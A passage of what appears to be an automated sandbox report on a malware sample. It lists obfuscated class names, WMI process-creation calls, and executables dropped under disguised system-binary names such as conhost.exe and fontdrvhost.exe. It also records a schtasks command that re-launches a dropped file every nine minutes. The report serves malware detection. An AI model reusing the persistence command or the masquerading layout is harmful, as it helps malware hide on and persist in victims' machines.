            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, w15WUwLeQ0wKR3imis.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'XyhkMftUe', 'JaBk1qIOcgicyDS7r0P', 'DfJD3vIk3J52ZiSCNtf', 'zSpedgIpb91qlVeWpmG', 'ifkNydIbhxld5AXDFMj', 'bdolMxI4QRS809M4AiN'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, BH0XUkutAY872hob19q.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'ENyLbwrsXZ', 'w4XOprgjCU', 'maGLq5bDiH', 'AC35GY65bJLi3BvUAOd', 'ousesR6ufngrtFNnAGf', 'jbGoYb6EbaOicajFQFs', 'rwNbkD6iCFKROjFxxPS', 'V2p1SN68Hg7SZUyFaF2'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, BgeFqCkVuNgJJ9V1jjj.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, vW90CPk8I6bgVlYefD8.csHigh entropy of concatenated method names: 'IqcDlQVuZC', 'AtLY49joMxVwmKqZNdP', 'OUJDiGjORcJRxfbFC3G', 'yBQqT9j8w5gYgdaSKIZ', 'PxuBefjHpSv377JM5t2', 'r3tOGXduva', 'j99OP8mNwI', 'dVuOLNGaPC', 'c3KOXkbdqZ', 'FE0Ofh1LBD'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, q5vwrDIrTL77p3cqbs.csHigh entropy of concatenated method names: 'Nhefn0pDs', 'HOq9ZvleL', 'LakQtC7ZE', 'Ta09lb1wlG661HQZdXc', 'UToRYU1Tj9LffyjABK5', 'LLODuJ1yNJC3nQ58Foj', 'sOvMQp1UryfJMYqQgwe', 'UUpgCj13PbiUJhWd7G6', 'ucOPA21Z6QuBgJ3tVOG', 'jXnSof1P0gEXHmK86yI'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, LbHd3dS9u0hlFuDwrHn.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'PDjmoatwQQ', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, M7T7yjNpIgyA1rJ8w6R.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'ILGcLjYOLLxYVt6p34M', 'tjim0NYk2HhOpnMr2bY', 'cdgx6lYpsKttevXM0l8', 'XSbUOoYb5Aia581weY5', 'OXUdoJY445tbCUP1iJk', 'kECdygY6bR4TxkBf6MP'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, bNj6eUPbclWJLKvWx8.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'MiRU7EnAFuYbGIww300', 'RY315snYnPi62f1IMpj', 'X0viuJnsNwRsggEaZEw', 'tIpD22ntD4tisyg7dXw', 'UAKUsJnFaqHUxCA1X0L', 'EuxFlvnaoT1RDUVhbXA'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, lTkOEi8u7TmEhYYYXUn.csHigh entropy of concatenated method names: 'Butcocv4grNrRNSpZGk', 'kv25SVv6XZhN4LgY9JZ', 'WQ8KE8vpmMpt3v5Csfr', 'AptlvbvboSIOrOFwbkt', 'MqshobqkU3', 'KomSaAvC0R1WEuanGp6', 'AWsxiMvKYyk8tPfJKxF', 'vr18I6vxxfv3ZoH1ULm', 'dpqULHvjHpqTV6SQCr7', 'VXxJISv7WnloKFb0R2A'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, rnbstSkcHs1Jkow974I.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'sOZwcuhJVj', '_3il', 'PnWwjkP8AA', 'IMxwulZGfV', '_78N', 'z3K'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, D2akdWk0HUpbspsiXcs.csHigh entropy of concatenated method names: '_7zt', 'NwaISkOJnT', 'GWFIhxncPr', 'b4bIgRXbqN', 'ekDI1pD7kG', 'N6EIA7Xo1H', 'DcxINtQ4L6', 'x0soVfC4C6HAxxr6jis', 'S10aDLC6gEJXNqaL1Uc', 'r4njfCCprjiUSIGBZCt'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, u8QwAQNhoIFqWUeGUoq.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'EtqZAOsSYYROSUDmDFT', 'rWaIGEszevQPeFscSCn', 'KY8VFQt0NHDJWJNYqWn', 'TByIDVt1NZ9xS4FmYBo', 'Dc7xp3tI23FDLGTcnJY', 'tlG9wDtfZK8JyFhSMQr'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, Wq9urVtVi019PaNmS5.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'Wlkici9BidNaUHm8QXK', 'VZ0Tvx9gcmROGFQ45iG', 'ovPmSn9qsLnqSwuGvs4', 'WIpENp9dpXkGkqKXXIP', 'ky4rJl9c3homMP8WA1V', 'nStaAX9rAaRfXlTg2cJ'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, ioigxVN8TNnxGU2EiPN.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'K9hW4fAqnO9sZnr4m6q', 'KQe3BYAdwZ5reVvVZR7', 'HTNNrOAcdMkKP9YVFBn', 'Yf4Fd8Ark65fgBqKZMC', 'F2PSN0AebeqdopY1PO5', 'eih42fAX8ZPFUAhRYJc'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, xQYJ1MuP4VWG5qY6oGW.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'RgyLOiKtk2', '_168', 'bi8wRP6jyXYkkNwLDat', 'CEnGP46Co0EVBrrCPEk', 'YZA3NS6KrJTP5IPZnaE', 'JhqceV67uIXWkbrSFiJ', 'FQIILS6QwdQYu18oYGx'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, fYgsDNunHfG8dWY7sx9.csHigh entropy of concatenated method names: '_5u9', 'sdyLpcIkJB', 'P5AOcHlRLC', 'eVyLBWhiYF', 'EVD63I4Vtn8siwft6MF', 'pweGSe4WMw9GVFFMG13', 'VmMsfM4SjuDsbtaQUb0', 'nE2kgy4JYDmgVQPRSQF', 'k4U7cM4hiTPvTa8HPDy', 'lCkPpn4zGEEQV0fu7ER'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, vFc2NbSWgcDAEfPGw0r.csHigh entropy of concatenated method names: 'XU05AxXanE', '_1kO', '_9v4', '_294', 'Isv5NstKc0', 'euj', 'HWo5olJNYG', 'DIv542otcT', 'o87', 'hqI5m12rcN'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, e7qXoLZraLdlSx0bfJy.csHigh entropy of concatenated method names: 'MZSWKse2mL', 'F5KhRSufpqxfZ0Oo9uP', 'GWdp3yu9j3tDMu1IZ8B', 'X4g5Itu1PXnUeIfkcka', 'fZcNc3uI8l9sdYOgZsl', 'cb7e7UunVD5EyJNWRUq', 'WcSrfxuApUSGtYWvDFX', 'fPmuRfuYux6u1JflMUd', 'gysrDyusyNHx8gkNX0x', 'pHVN9rutjS1FWUdeoRV'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, KfLtnaZv23eIIYbvUHq.csHigh entropy of concatenated method names: 'TUUpgoBNlR', 'joHp1g2XPC', 'gEcpAlFIga', 'QLjpNxbbwq', 'Rf6pot3UK3', 'Qj68Toi04SRpAYZArtA', 'FbEDXGi12mw9URibI3c', 'UQrDBkESFcLVKm0HNGf', 'CiO7RrEzuKvg66dqM2h', 'ACkW2MiIAVKCbfQTSMq'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, Y3D0b0uTvQv7DhMAmZN.csHigh entropy of concatenated method names: 'fGFq3UjQ4E', 'y9kq6NMm5r', 'UWIqRi2CsR', 'R4MQ3LpqM9PELWfnNDo', 'pnbiwnpdc9hDSWonjMi', 'lDqQLkpcxS4dhWSQvTd', 'brtDHcprKZYvWHr33m6', 'TgVbJZpeWjXecw0wRwg', 'cee17IpXNZiFZg6hlhB', 'NvIYFLpMNymBLq7YByA'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, StBSLES40vH4latTFen.csHigh entropy of concatenated method names: 'aJsxD3B93gpRJMROnY9', 'e10vJfBnvicj0HdxaUS', 'MwiEdCBIFgv6hsNv1pr', 'HNnU8fBfHtLEjrKFUXU', 'BLiYfZilxk', 'WM4', '_499', 'LpdY9B3HrM', 'GpxYQgfcxg', 'qyAYtiX4bA'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, q19di7SLKcyasLtZRZg.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'o6QY4FoQ5i', 'YrVYmoYyCX', 'lECYYaue5w', 'Ja3YEauafL', 'UaRYnCMRIM', 'xfLY5E15Ol', 'gcy5W6PytU1l7t0YqK9'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, ONcMMsl4eyKUDOhuV2.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'lxq98BfhW5phSFWUTie', 'PrNofsfVjld0F45XEgw', 'VQjYp0fW5sjjBaaHkX0', 'CpnDISfSuXj3TFvQIMH', 'rNED0dfz0kQ1Yet0HNh', 'xlw3fL903mOIRH4R81C'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, xjm59PSnyhiAsLMBQfr.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'xV35FbRL8e', 'ARu5Or1bZ2', 'iEK5VeO8uX', 'EC9', '_74a', '_8pl', '_27D', '_524'

            Persistence and Installation Behavior

            barindex
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile created: C:\Program Files (x86)\Java\jre-1.8\lib\applet\WmiPrvSE.exeJump to dropped file
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile created: C:\Program Files (x86)\Microsoft OneDrive\setup\logs\Idle.exeJump to dropped file
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile created: C:\Users\Default\mmeUVmNHPOdst.exeJump to dropped file
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile created: C:\Recovery\mmeUVmNHPOdst.exeJump to dropped file
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile created: C:\Program Files\Windows NT\Accessories\en-GB\conhost.exeJump to dropped file
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile created: C:\Program Files\7-Zip\Lang\TextInputHost.exeJump to dropped file
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile created: C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exeJump to dropped file
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeFile created: C:\blockrefSessionBrokerDll\chainMonitor.exeJump to dropped file
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile created: C:\Users\Public\Pictures\mmeUVmNHPOdst.exeJump to dropped file
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile created: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeJump to dropped file
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeJump to dropped file
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile created: C:\Users\Default\mmeUVmNHPOdst.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile created: C:\Users\Default\mmeUVmNHPOdst.exeJump to dropped file
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 9 /tr "'C:\Users\Default\mmeUVmNHPOdst.exe'" /f
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
